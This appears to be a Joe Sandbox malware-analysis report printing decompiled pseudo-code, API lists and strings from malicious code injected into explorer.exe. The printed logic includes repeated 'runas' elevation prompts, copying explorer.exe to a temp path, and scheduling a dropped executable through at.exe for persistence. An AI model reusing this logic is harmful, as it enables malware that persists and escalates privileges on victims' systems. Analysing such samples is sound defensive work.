				__eflags = _a4 + 0x1c68;
				E003F8AB0( &_v3140,  &_v3140, _a4 + 0x1c68, 0x20);
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				__eflags = _a4 + 0x1c88;
				E003F4820(_a4 + 0x1c88, _a4 + 0x1c88, 0x14, 0x1e,  &_v3140);
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				__eflags = _a16 & 0x00000001;
				if((_a16 & 0x00000001) == 0) {
					 *((intOrPtr*)(_a4 + 0x1ca8)) = E003F9C00();
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							goto L74;
						}
					}
				}
				L74:
				return 1;
			}

0x003fa090
0x003fa099
0x003fa0a0
0x003fa0a7
0x003fa0ae
0x003fa0b5
0x003fa0c7
0x003fa0d8
0x003fa0f8
0x003fa0fd
0x003fa119
0x003fa128
0x003fa12f
0x003fa134
0x003fa13a
0x003fa11b
0x003fa11b
0x003fa11f
0x003fa121
0x003fa152
0x003fa161
0x003fa164
0x003fa169
0x003fa16c
0x003fa16e
0x003fa185
0x003fa18a
0x003fa18c
0x003fa1a6
0x003fa1b0
0x003fa1b0
0x003fa1b2
0x00000000
0x00000000
0x003fa1b4
0x003fa18e
0x003fa191
0x003fa19b
0x003fa19b
0x003fa19d
0x00000000
0x00000000
0x003fa19f
0x003fa1a1
0x003fa170
0x003fa173
0x003fa17d
0x003fa17d
0x003fa17f
0x00000000
0x00000000
0x003fa181
0x003fa183
0x003fa1b6
0x003fa1bc
0x003fa1c2
0x003fa1c2
0x003fa1c4
0x00000000
0x00000000
0x003fa1c6
0x003fa1c8
0x003fa1cf
0x003fa203
0x003fa209
0x003fa20b
0x003fa213
0x003fa227
0x003fa22e
0x003fa233
0x003fa236
0x003fa236
0x003fa238
0x00000000
0x00000000
0x003fa23a
0x003fa236
0x003fa23c
0x003fa23f
0x003fa242
0x003fa271
0x003fa274
0x003fa33b
0x003fa33b
0x003fa34c
0x003fa27a
0x003fa27d
0x003fa280
0x003fa280
0x003fa282
0x00000000
0x00000000
0x003fa284
0x003fa299
0x003fa2a8
0x003fa2b6
0x003fa2c5
0x003fa2d4
0x003fa2e2
0x003fa2f1
0x003fa300
0x003fa30e
0x003fa31d
0x003fa32c
0x003fa32c
0x003fa244
0x003fa247
0x003fa24a
0x003fa24a
0x003fa24c
0x00000000
0x00000000
0x003fa24e
0x003fa263
0x003fa263
0x003fa369
0x003fa38f
0x003fa3aa
0x003fa3c7
0x003fa3e2
0x003fa403
0x003fa417
0x003fa431
0x003fa444
0x003fa455
0x003fa45f
0x003fa47e
0x003fa49b
0x003fa4a5
0x003fa4b5
0x003fa4c4
0x003fa4c9
0x003fa4d2
0x003fa4d8
0x003fa4d8
0x003fa4da
0x00000000
0x00000000
0x003fa4dc
0x003fa4e9
0x003fa4f4
0x003fa4fe
0x003fa51e
0x003fa52c
0x003fa53b
0x003fa53c
0x003fa541
0x003fa547
0x003fa54e
0x003fa54e
0x003fa550
0x00000000
0x00000000
0x003fa552
0x003fa562
0x003fa568
0x003fa56a
0x003fa574
0x003fa574
0x003fa576
0x00000000
0x00000000
0x003fa578
0x003fa56c
0x003fa56c
0x003fa56c
0x003fa56e
0x00000000
0x00000000
0x003fa570
0x003fa572
0x003fa57a
0x003fa58b
0x003fa591
0x003fa593
0x003fa595
0x003fa595
0x003fa597
0x00000000
0x00000000
0x003fa599
0x003fa59e
0x003fa59e
0x003fa5aa
0x003fa5aa
0x003fa5c3
0x003fa5c9
0x003fa5cb
0x003fa5cd
0x003fa5cd
0x003fa5cf
0x00000000
0x00000000
0x003fa5d1
0x003fa5d3
0x003fa5f5
0x003fa5fa
0x003fa600
0x003fa600
0x003fa60c
0x003fa60c
0x003fa626
0x003fa62c
0x003fa62e
0x003fa630
0x003fa630
0x003fa632
0x00000000
0x00000000
0x003fa634
0x003fa639
0x003fa639
0x003fa645
0x003fa645
0x003fa659
0x003fa65f
0x003fa661
0x003fa663
0x003fa663
0x003fa665
0x00000000
0x00000000
0x003fa667
0x003fa673
0x003fa673
0x003fa679
0x003fa694
0x003fa6c7
0x003fa6d4
0x003fa6e1
0x003fa6e9
0x003fa6e9
0x003fa6eb
0x00000000
0x00000000
0x003fa6ed
0x003fa6fd
0x003fa704
0x003fa70c
0x003fa70c
0x003fa70e
0x00000000
0x00000000
0x003fa710
0x003fa715
0x003fa718
0x003fa722
0x003fa728
0x003fa728
0x003fa72a
0x00000000
0x00000000
0x003fa72c
0x003fa728
0x003fa72e
0x003fa736

APIs

GetCurrentProcessId.KERNEL32 ref: 003FA0CF
GetTickCount.KERNEL32(-00000A5C), ref: 003FA0E8
GetModuleFileNameW.KERNEL32(00000000,-00001A58,00000105), ref: 003FA111
GetCurrentProcess.KERNEL32 ref: 003FA140
LookupAccountSidW.ADVAPI32(00000000,-00000208,-00000208,00000080,-00000308,00000080,00000000), ref: 003FA203
GetLastError.KERNEL32 ref: 003FA20D
lstrcpynW.KERNEL32(-00000410,00000000,0000020A), ref: 003FA263
lstrcpynW.KERNEL32(-00000410,00000000,00000105), ref: 003FA299
GetModuleFileNameW.KERNEL32(?,-00000410,0000020A), ref: 003FA34C
lstrcpynW.KERNEL32(-000000C4,00000000,?,00000040), ref: 003FA38F
lstrlenW.KERNEL32(-000000C4,?,00000040), ref: 003FA39F
lstrcpynW.KERNEL32(-00000850,-00000620,00000105,?,?,?,?,?,?,00000040), ref: 003FA403
lstrcatW.KERNEL32(-00000850,004087F0,?,?,?,?,?,?,00000040), ref: 003FA417
lstrcatW.KERNEL32(-00000850,-000000C4,?,?,?,?,?,?,00000040), ref: 003FA431
lstrcatW.KERNEL32(-00000850,00000000,?,?,?,?,?,?,?,00000040), ref: 003FA455
lstrlenA.KERNEL32(-000000A4,00000000,-00001420,?,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 003FA49B
GetCurrentProcess.KERNEL32 ref: 003FA4BD
GetVersionExA.KERNEL32(00000000), ref: 003FA4FE
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 003FA50E
GetProcAddress.KERNEL32(00000000), ref: 003FA515
GetWindowsDirectoryW.KERNEL32(-00001434,00000104), ref: 003FA562
GetEnvironmentVariableW.KERNEL32(SystemRoot,?,00000104), ref: 003FA58B
SetEnvironmentVariableW.KERNEL32(SystemRoot,-00001434), ref: 003FA5AA
GetEnvironmentVariableW.KERNEL32(USERPROFILE,-00001848,00000209), ref: 003FA5C3
SetEnvironmentVariableW.KERNEL32(USERPROFILE,-00001848), ref: 003FA60C
GetEnvironmentVariableW.KERNEL32(TEMP,-0000163E,0000020A), ref: 003FA626
SetEnvironmentVariableW.KERNEL32(TEMP,-00001848), ref: 003FA645
GetEnvironmentVariableA.KERNEL32(SystemDrive,?,0000003F), ref: 003FA659
SetEnvironmentVariableA.KERNEL32(SystemDrive,00408850), ref: 003FA673
GetComputerNameW.KERNEL32(-00001DB0,0000007F), ref: 003FA694
lstrlenA.KERNEL32(-00001420,00000000,?), ref: 003FA6AD

Strings

TEMP, xrefs: 003FA621, 003FA640
%s\%s, xrefs: 003FA5E2
kernel32, xrefs: 003FA509
SystemRoot, xrefs: 003FA586, 003FA5A5
IsWow64Process, xrefs: 003FA504
LookupAccountSidW() err %u, xrefs: 003FA21A
USERPROFILE, xrefs: 003FA5BE, 003FA607
SystemDrive, xrefs: 003FA654, 003FA66E
TEMP, xrefs: 003FA5D3

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: EnvironmentVariable$lstrcpyn$CurrentModuleNameProcesslstrcatlstrlen$File$AccountAddressComputerCountDirectoryErrorHandleLastLookupProcTickVersionWindows
String ID: %s\%s$IsWow64Process$LookupAccountSidW() err %u$SystemDrive$SystemRoot$TEMP$TEMP$USERPROFILE$kernel32
API String ID: 2722344402-164610414
Opcode ID: 960f69ac77c9dd1ba2621cc0e94838faaadf91e60b335f0d60c7d939499f8900
Instruction ID: eada5f40ae6f6054641111cd7a4bf9fd5ec8b585e3fa70e2309758e25b699de9
Opcode Fuzzy Hash: 960f69ac77c9dd1ba2621cc0e94838faaadf91e60b335f0d60c7d939499f8900
Instruction Fuzzy Hash: CD129FB4A00608ABDB05DF64DC55FBA3765EF44349F18C138FB09AF382DA75DA408B99

Uniqueness

Uniqueness Score: 100.00%

Function 003F31F0, Relevance: 31.8, APIs: 11, Strings: 7, Instructions: 333
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 51%

			_entry_() {
				short* _v8;
				void _v1034;
				short _v1036;
				WCHAR* _v1040;
				int _v1044;
				PWCHAR* _v1048;
				int _v1052;
				short* _v1056;
				short* _v1060;
				void* _v1064;
				short* _v1068;
				short _v1588;
				signed int _v1592;
				short _t69;
				int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				signed int _t83;
				signed int _t85;
				signed int _t88;
				signed int _t91;
				int _t96;
				intOrPtr _t118;
				signed int _t119;
				intOrPtr _t122;
				PWCHAR* _t126;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t150;
				void* _t156;
				void* _t169;

				_t69 =  *0x40f6dc; // 0x0
				_v1036 = _t69;
				memset( &_v1034, 0, 0x3fe);
				_t147 = _t146 + 0xc;
				_v1048 = 0;
				_v8 = 0;
				_v1044 = 0;
				_v1060 = 0;
				_v1052 = 0;
				_v1056 = 0;
				_v1040 = GetCommandLineW();
				_v1048 = CommandLineToArgvW(_v1040,  &_v1044);
				if(_v1048 != 0) {
					E003F3EC0();
					do {
						__eflags = 0;
					} while (0 != 0);
					do {
						__eflags = 0;
					} while (0 != 0);
					_t75 = E003F7D90(0, 3);
					_t148 = _t147 + 4;
					_v1052 = _t75;
					__eflags = _v1052;
					if(_v1052 >= 0) {
						 *0x40f6c4 = GetModuleHandleA(0);
						_t118 =  *0x40f6c4; // 0x400000
						_t77 = E003FA070(_t118, 0, 0);
						_t149 = _t148 + 0xc;
						__eflags = _t77;
						if(_t77 != 0) {
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_t78 = E003FC170(_t118);
							__eflags = _t78;
							if(_t78 == 0) {
								_push(0);
								_t79 = E003F7A30(_t118, 0x40e030);
								_t150 = _t149 + 8;
								__eflags = _t79;
								if(_t79 >= 0) {
									__eflags = _v1044 - 1;
									if(_v1044 <= 1) {
										_t119 =  *0x411408; // 0x0
										_t120 = _t119 & 0x00000040;
										__eflags = _t119 & 0x00000040;
										if(__eflags == 0) {
											 *0x40ffac = E003FB500();
										}
										_t80 = E003F2D30(_t120, __eflags, _t169);
										__eflags = _t80;
										if(_t80 != 0) {
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											__eflags =  *0x40fb68 - 3;
											if( *0x40fb68 != 3) {
												__eflags =  *0x411408 - 0x10;
												if( *0x411408 != 0x10) {
													_t81 = E003F8AF0(0, 0);
													__eflags = _t81;
													if(_t81 != 0) {
														_t83 = E003F8AF0(1, 0);
														__eflags = _t83;
														if(_t83 != 0) {
															E003F8C10(1);
															_t122 =  *0x40fb6c; // 0x3f0000
															_t85 = E003FBB30(E003F2A60, _t122);
															__eflags = _t85;
															if(_t85 == 0) {
																E003F25E0(_t122);
															}
															E003F8C10(0);
														}
													}
												} else {
													_t88 = E003F8AF0(0, 0);
													_t156 = _t150 + 8;
													__eflags = _t88;
													if(_t88 != 0) {
														_t91 = E003F8AF0(1, 0);
														_t156 = _t156 + 8;
														__eflags = _t91;
														if(_t91 != 0) {
															E003F25E0(0);
														}
													}
													E003F8C10(1);
													E003F8C10(0);
												}
												goto L91;
											}
											_push(E003F3E00(0));
											E003F3B30( &_v1588, 0x104, L"%s\\%d.exe", "C:\Users\Luke\AppData\Local\Temp");
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											_t96 = CopyFileW("C:\Windows\explorer.exe",  &_v1588, 0);
											__eflags = _t96;
											if(_t96 != 0) {
												E003F41B0( &_v1588,  &_v1588, 0, 0, 1);
												_v1052 = 0;
												goto L91;
											} else {
												goto L77;
											}
											while(1) {
												L77:
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											_v1052 = 0xffffffff;
										} else {
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													goto L52;
												}
											}
											while(1) {
												L52:
												__eflags = 0;
												if(0 == 0) {
													goto L54;
												}
											}
											while(1) {
												L54:
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											__eflags =  *0x410b90 - 1;
											if( *0x410b90 != 1) {
												E003F2C20(0, _t169, 0, 0);
												goto L91;
											}
											_v1068 = 0;
											__imp__CoInitializeEx(0, 6);
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											_push(0);
											_push("\"");
											_push("C:\Windows\explorer.exe");
											_push("\"");
											_v1068 = E003F4CB0(L"/c ");
											do {
												_v1064 = ShellExecuteW( *0x411648(), L"runas", L"cmd", _v1068, 0, 0);
												__eflags = _v1064 - 5;
												if(_v1064 != 5) {
													goto L65;
												} else {
													goto L62;
												}
												while(1) {
													L62:
													__eflags = 0;
													if(0 == 0) {
														break;
													}
												}
												Sleep(0x7d0);
												L65:
												__eflags = _v1064 - 5;
											} while (_v1064 == 5);
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											E003F3F10( &_v1068, 0xfffffffe);
											_v1052 = 0;
										}
										goto L91;
									}
									_t126 = _v1048;
									__eflags = ( *( *(_t126 + 4)) & 0x0000ffff) - 0x2f;
									if(( *( *(_t126 + 4)) & 0x0000ffff) == 0x2f) {
										_v1592 = _v1048[1][1] & 0x0000ffff;
										_v1592 = _v1592 - 0x41;
										__eflags = _v1592 - 0x33;
										if(__eflags > 0) {
											while(1) {
												L43:
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											_v1052 = 2;
											L46:
											goto L91;
										}
										_t33 = _v1592 + 0x3f374c; // 0xec8b550a
										switch( *((intOrPtr*)(( *_t33 & 0x000000ff) * 4 +  &M003F371C))) {
											case 0:
												_push(_v1048[3]);
												L003F3AB0();
												E003F3780(_t169, _v1048[3], _v1048[2]);
												_v1052 = 0;
												goto L46;
											case 1:
												_v1052 = E003FB340(__ecx, __edx);
												goto L46;
											case 2:
												__eax = E003F2C20(__ecx, __fp0, 0, 1);
												__eflags = _v1044 - 2;
												if(__eflags > 0) {
													__eax = _v1048;
													__ecx = _v1048[2];
													__eax = E003FBF20(_v1048[2], __eflags, _v1048[2]);
												}
												goto L46;
											case 3:
												__ecx = _v1048;
												__edx = _v1048[2];
												_v1052 = E003F1600(_v1048[2]);
												goto L46;
											case 4:
												_v1052 = 0x6f;
												goto L46;
											case 5:
												__eax = E003F18C0();
												_v1052 = 1;
												goto L46;
											case 6:
												__eax = E003F3050(__ecx, __edx, __eflags);
												goto L46;
											case 7:
												_v1052 = E003F2F70(__ecx, __eflags);
												goto L46;
											case 8:
												__eax = E003F2C20(__ecx, __fp0, 0, 0);
												__eflags = _v1044 - 2;
												if(__eflags > 0) {
													__edx = _v1048;
													_v1048[4] = E003FBF20(__ecx, __eflags, _v1048[4]);
												}
												goto L46;
											case 9:
												 *0x40ffac = E003FB500();
												__eax = E003F1420();
												goto L46;
											case 0xa:
												__eax = E003F18E0();
												goto L46;
											case 0xb:
												goto L43;
										}
									} else {
										goto L23;
									}
									while(1) {
										L23:
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									_v1052 = 2;
									goto L91;
								} else {
									goto L18;
								}
								while(1) {
									L18:
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								_v1052 = 3;
								goto L91;
							}
							_v1052 = 0;
							goto L91;
						}
						_v1052 = 1;
						goto L91;
					} else {
						goto L8;
					}
					while(1) {
						L8:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_v1052 = 1;
					goto L91;
				} else {
					_v1052 = 1;
					L91:
					while(0 != 0) {
					}
					ExitProcess(_v1052);
				}
			}

0x003f31f9
0x003f31ff
0x003f3214
0x003f3219
0x003f321c
0x003f3226
0x003f322d
0x003f3237
0x003f3241
0x003f324b
0x003f325b
0x003f3275
0x003f3282
0x003f3293
0x003f3298
0x003f3298
0x003f3298
0x003f329e
0x003f329e
0x003f329e
0x003f32a6
0x003f32ab
0x003f32ae
0x003f32b4
0x003f32bb
0x003f32da
0x003f32e3
0x003f32ea
0x003f32ef
0x003f32f2
0x003f32f4
0x003f3305
0x003f3305
0x003f3307
0x00000000
0x00000000
0x003f3309
0x003f330b
0x003f3310
0x003f3312
0x003f3323
0x003f332a
0x003f332f
0x003f3332
0x003f3334
0x003f334b
0x003f3352
0x003f34d2
0x003f34d8
0x003f34d8
0x003f34db
0x003f34e2
0x003f34e2
0x003f34e7
0x003f34ec
0x003f34ee
0x003f35d3
0x003f35d3
0x003f35d5
0x00000000
0x00000000
0x003f35d7
0x003f35d9
0x003f35e0
0x003f3666
0x003f366d
0x003f36ae
0x003f36b6
0x003f36b8
0x003f36be
0x003f36c6
0x003f36c8
0x003f36cc
0x003f36d4
0x003f36e0
0x003f36e8
0x003f36ea
0x003f36ec
0x003f36ec
0x003f36f3
0x003f36f8
0x003f36c8
0x003f366f
0x003f3673
0x003f3678
0x003f367b
0x003f367d
0x003f3683
0x003f3688
0x003f368b
0x003f368d
0x003f368f
0x003f368f
0x003f368d
0x003f3696
0x003f36a0
0x003f36a5
0x00000000
0x003f366d
0x003f35f0
0x003f3607
0x003f360f
0x003f360f
0x003f3611
0x00000000
0x00000000
0x003f3613
0x003f3623
0x003f3629
0x003f362b
0x003f364f
0x003f3657
0x00000000
0x00000000
0x00000000
0x00000000
0x003f362d
0x003f362d
0x003f362d
0x003f362f
0x00000000
0x00000000
0x003f3631
0x003f3633
0x003f34f4
0x003f34f4
0x003f34f4
0x003f34f6
0x00000000
0x00000000
0x003f34f8
0x003f34fa
0x003f34fa
0x003f34fa
0x003f34fc
0x00000000
0x00000000
0x003f34fe
0x003f3500
0x003f3500
0x003f3500
0x003f3502
0x00000000
0x00000000
0x003f3504
0x003f3506
0x003f350d
0x003f35c6
0x00000000
0x003f35cb
0x003f3513
0x003f3521
0x003f3527
0x003f3527
0x003f3529
0x00000000
0x00000000
0x003f352b
0x003f352d
0x003f352f
0x003f3534
0x003f3539
0x003f354b
0x003f3551
0x003f3573
0x003f3579
0x003f3580
0x00000000
0x00000000
0x00000000
0x00000000
0x003f3582
0x003f3582
0x003f3582
0x003f3584
0x00000000
0x00000000
0x003f3586
0x003f358d
0x003f3593
0x003f3593
0x003f3593
0x003f359c
0x003f359c
0x003f359e
0x00000000
0x00000000
0x003f35a0
0x003f35ab
0x003f35b3
0x003f35b3
0x00000000
0x003f34ee
0x003f3358
0x003f3364
0x003f3367
0x003f338b
0x003f339a
0x003f33a0
0x003f33a7
0x003f34bd
0x003f34bd
0x003f34bd
0x003f34bf
0x00000000
0x00000000
0x003f34c1
0x003f34c3
0x003f34cd
0x00000000
0x003f34cd
0x003f33b3
0x003f33ba
0x00000000
0x003f33ca
0x003f33d5
0x003f33de
0x003f33e6
0x00000000
0x00000000
0x003f347b
0x00000000
0x00000000
0x003f33f9
0x003f3401
0x003f3408
0x003f340a
0x003f3410
0x003f3414
0x003f3419
0x00000000
0x00000000
0x003f34a3
0x003f34a9
0x003f34b5
0x00000000
0x00000000
0x003f3497
0x00000000
0x00000000
0x003f3454
0x003f3459
0x00000000
0x00000000
0x003f3483
0x00000000
0x00000000
0x003f348f
0x00000000
0x00000000
0x003f3425
0x003f342d
0x003f3434
0x003f3436
0x003f3440
0x003f3445
0x00000000
0x00000000
0x003f346a
0x003f346f
0x00000000
0x00000000
0x003f344d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003f3369
0x003f3369
0x003f3369
0x003f336b
0x00000000
0x00000000
0x003f336d
0x003f336f
0x00000000
0x00000000
0x00000000
0x00000000
0x003f3336
0x003f3336
0x003f3336
0x003f3338
0x00000000
0x00000000
0x003f333a
0x003f333c
0x00000000
0x003f333c
0x003f3314
0x00000000
0x003f3314
0x003f32f6
0x00000000
0x00000000
0x00000000
0x00000000
0x003f32bd
0x003f32bd
0x003f32bd
0x003f32bf
0x00000000
0x00000000
0x003f32c1
0x003f32c3
0x00000000
0x003f3284
0x003f3284
0x00000000
0x003f36fb
0x003f36ff
0x003f3708
0x003f3708

APIs

memset.MSVCRT(?,00000000,000003FE), ref: 003F3214
GetCommandLineW.KERNEL32 ref: 003F3255
CommandLineToArgvW.SHELL32(?,00000000), ref: 003F326F
ExitProcess.KERNEL32 ref: 003F3708

Strings

runas, xrefs: 003F3561
cmd, xrefs: 003F355C
C:\Users\user\AppData\Local\Temp, xrefs: 003F35F1
/c , xrefs: 003F353E
3, xrefs: 003F33A0
%s\%d.exe, xrefs: 003F35F6
C:\Windows\explorer.exe, xrefs: 003F3534, 003F361E

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CommandLine$ArgvExitProcessmemset
String ID: %s\%d.exe$/c $3$C:\Users\user\AppData\Local\Temp$C:\Windows\explorer.exe$cmd$runas
API String ID: 676070630-984246308
Opcode ID: 802981d44b8820fc70111ddd4bca7345883be72fb8d90e2322cace97b54d10be
Instruction ID: 3b4c1e29422b4013c6b95f58abf73b755e53a1475eebc3d2d9dd2ed308c5e4bb
Opcode Fuzzy Hash: 802981d44b8820fc70111ddd4bca7345883be72fb8d90e2322cace97b54d10be
Instruction Fuzzy Hash: BCC1CCF4E0420CE6DB23AB60DD467B972749B40305F1444B9E70A6B281EB759BC4CEBA

Uniqueness

Uniqueness Score: 100.00%

Function 003FF770, Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 321
stringfiletimeUNIQUECrypto

Download Yara Rule

C-Code - Quality: 40%

			E003FF770(void* __fp0, signed int _a4) {
				int _v8;
				intOrPtr _v20;
				intOrPtr _v28;
				char _v36;
				char _v40;
				signed int _v44;
				char _v48;
				int _v52;
				char _v572;
				signed int _v576;
				signed short _v580;
				struct _SYSTEMTIME _v596;
				signed short _v600;
				int _v604;
				signed short _v608;
				char _v640;
				signed int _v644;
				signed int _v648;
				struct _SYSTEMTIME _v664;
				char _v1708;
				WCHAR* _v1712;
				short _v2236;
				signed int _v2240;
				signed int _v2244;
				signed int _t96;
				signed int _t97;
				signed int _t107;
				signed int _t109;
				signed int _t148;
				char _t157;
				intOrPtr _t215;
				intOrPtr _t216;
				void* _t217;
				void* _t218;
				void* _t233;

				_t233 = __fp0;
				_push(0xffffffff);
				_push(0x40c608);
				_push(0x3f3ab6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t215;
				_t216 = _t215 + 0xfffff750;
				_v28 = _t216;
				_v52 = 0;
				if(E003FC0D0() == 0) {
					_push(0);
					_t96 = E003F7A30(_t156, 0x40f530);
					_t217 = _t216 + 8;
					__eflags = _t96;
					if(_t96 >= 0) {
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						L10:
						_t97 = E003FED90(__eflags, _t233);
						__eflags = _t97;
						if(_t97 != 0) {
							_v8 = 0;
							__eflags =  *0x40fb68 - 3;
							if( *0x40fb68 == 3) {
								E003FC1B0(_t156);
								L17:
								__eflags =  *0x410b90 - 3;
								if( *0x410b90 == 3) {
									L21:
									E003F4120(_t156,  &_v48, 0, 0x14);
									_t218 = _t217 + 0xc;
									_v44 = _a4;
									_t157 =  *0x40fb68; // 0x2
									_v48 = _t157;
									while(1) {
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									__eflags =  *0x411aa0;
									if( *0x411aa0 == 0) {
										while(1) {
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										L34:
										E00400B40(__eflags, E003FECB0,  &_v48);
										_t217 = _t218 + 8;
										__eflags =  *0x40f710;
										if( *0x40f710 <= 0) {
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											L66:
											_v8 = 0xffffffff;
											lstrcpynW( &_v2236, "C:\Windows\explorer.exe", 0x104);
											_v1712 = E003F7F40( &_v2236, 0x5bf);
											lstrcatW( &_v2236, _v1712);
											E003F8170( &_v1712);
											_t107 = E003FE080( &_v1712,  &_v2236);
											__eflags = _t107;
											if(_t107 != 0) {
												DeleteFileW( &_v2236);
											}
											E003FEE20();
											_t109 = 0;
											__eflags = 0;
											L70:
											 *[fs:0x0] = _v20;
											return _t109;
										}
										__eflags =  *0x411aa0;
										if( *0x411aa0 != 0) {
											__eflags =  *0x411a9c;
											if( *0x411a9c != 0) {
												 *0x411a9c(_v40);
											}
										}
										while(1) {
											__eflags = 0;
											if(0 == 0) {
												goto L40;
											}
										}
										while(1) {
											L40:
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										__eflags =  *0x40fb68 - 3;
										if( *0x40fb68 == 3) {
											L63:
											goto L66;
										}
										__eflags =  *0x40f764 - 6;
										if( *0x40f764 >= 6) {
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											__eflags =  *0x40f764 - 6;
											if( *0x40f764 < 6) {
												goto L63;
											}
											__eflags =  *0x410b90 - 3;
											if( *0x410b90 != 3) {
												goto L63;
											}
											_v604 = 0;
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											E003FEDF0();
											memset( &_v664, 0, 0x10);
											GetLocalTime( &_v664);
											_v648 = (_v664.wMinute & 0x0000ffff) + 2;
											asm("cdq");
											_v600 = (_v664.wHour & 0x0000ffff) + (_v648 & 0x0000ffff) / 0x3c;
											asm("cdq");
											_v648 = (_v648 & 0x0000ffff) % 0x3c;
											_v644 = (_v664.wMinute & 0x0000ffff) + 0xe;
											asm("cdq");
											_v608 = (_v664.wHour & 0x0000ffff) + (_v644 & 0x0000ffff) / 0x3c;
											asm("cdq");
											_t66 = (_v644 & 0x0000ffff) % 0x3c;
											__eflags = _t66;
											_v644 = _t66;
											_v604 = E003F7F40(0x3c, 0x23c4);
											E003F48B0(__eflags,  &_v640, 7, 0xa, 0x4101bc);
											_push(_v644 & 0x0000ffff);
											_push(_v608 & 0x0000ffff);
											_push(_v648 & 0x0000ffff);
											_push(_v600 & 0x0000ffff);
											_push( &_v640);
											_push("C:\Users\Luke\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe");
											_push( &_v640);
											E003F3B30( &_v1708, 0x208, _v604, "C:\Windows");
											E003F8170( &_v604);
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											E003F41B0( &_v1708,  &_v1708, 0, 0xbb8, 1);
											_v2244 = 0;
											_v8 = 0xffffffff;
											_t109 = _v2244;
											goto L70;
										}
										__eflags =  *0x40fb68 - 2;
										if( *0x40fb68 != 2) {
											goto L63;
										} else {
											goto L45;
										}
										while(1) {
											L45:
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										E003FEDF0();
										memset( &_v596, 0, 0x10);
										GetLocalTime( &_v596);
										_v576 = (_v596.wMinute & 0x0000ffff) + 2;
										asm("cdq");
										_v580 = (_v596.wHour & 0x0000ffff) + (_v576 & 0x0000ffff) / 0x3c;
										asm("cdq");
										_t26 = (_v576 & 0x0000ffff) % 0x3c;
										__eflags = _t26;
										_v576 = _t26;
										_push("C:\Users\Luke\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe");
										_push(_v576 & 0x0000ffff);
										_t179 =  &_v572;
										E003F3B30( &_v572, 0x104, L"at.exe %u:%u \"%s\" /I", _v580 & 0x0000ffff);
										while(1) {
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										E003F41B0(_t179,  &_v572, 0, 0xbb8, 1);
										_v2240 = 0;
										_v8 = 0xffffffff;
										_t109 = _v2240;
										goto L70;
									}
									_t148 =  *0x411aa0(0, 0, 1,  &_v40,  &_v36);
									__eflags = _t148;
									if(_t148 != 0) {
										while(1) {
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										L31:
										goto L34;
									} else {
										goto L26;
									}
									while(1) {
										L26:
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									goto L31;
								}
								__eflags =  *0x40fb68 - 3;
								if( *0x40fb68 == 3) {
									goto L21;
								}
								__eflags =  *0x40f764 - 6;
								if( *0x40f764 >= 6) {
									goto L66;
								}
								__eflags =  *0x40fb68 - 2;
								if( *0x40fb68 != 2) {
									goto L66;
								}
								goto L21;
							} else {
								goto L13;
							}
							while(1) {
								L13:
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_t156 = _a4;
							E003FEC30(_t233, _a4);
							_t217 = _t217 + 4;
							goto L17;
						}
						_t109 = E003FEE20() | 0xffffffff;
						goto L70;
					} else {
						goto L5;
					}
					while(1) {
						L5:
						_t156 = 0;
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					goto L10;
				}
				while(0 != 0) {
				}
				_t109 = 0xffffffff;
				goto L70;
			}

0x003ff770
0x003ff773
0x003ff775
0x003ff77a
0x003ff785
0x003ff786
0x003ff78d
0x003ff796
0x003ff799
0x003ff7a7
0x003ff7b7
0x003ff7be
0x003ff7c3
0x003ff7c6
0x003ff7c8
0x003ff7d2
0x003ff7d2
0x003ff7d4
0x00000000
0x00000000
0x003ff7d6
0x003ff7d8
0x003ff7d8
0x003ff7dd
0x003ff7df
0x003ff7ee
0x003ff7f5
0x003ff7fc
0x003ff812
0x003ff817
0x003ff817
0x003ff81e
0x003ff843
0x003ff84b
0x003ff850
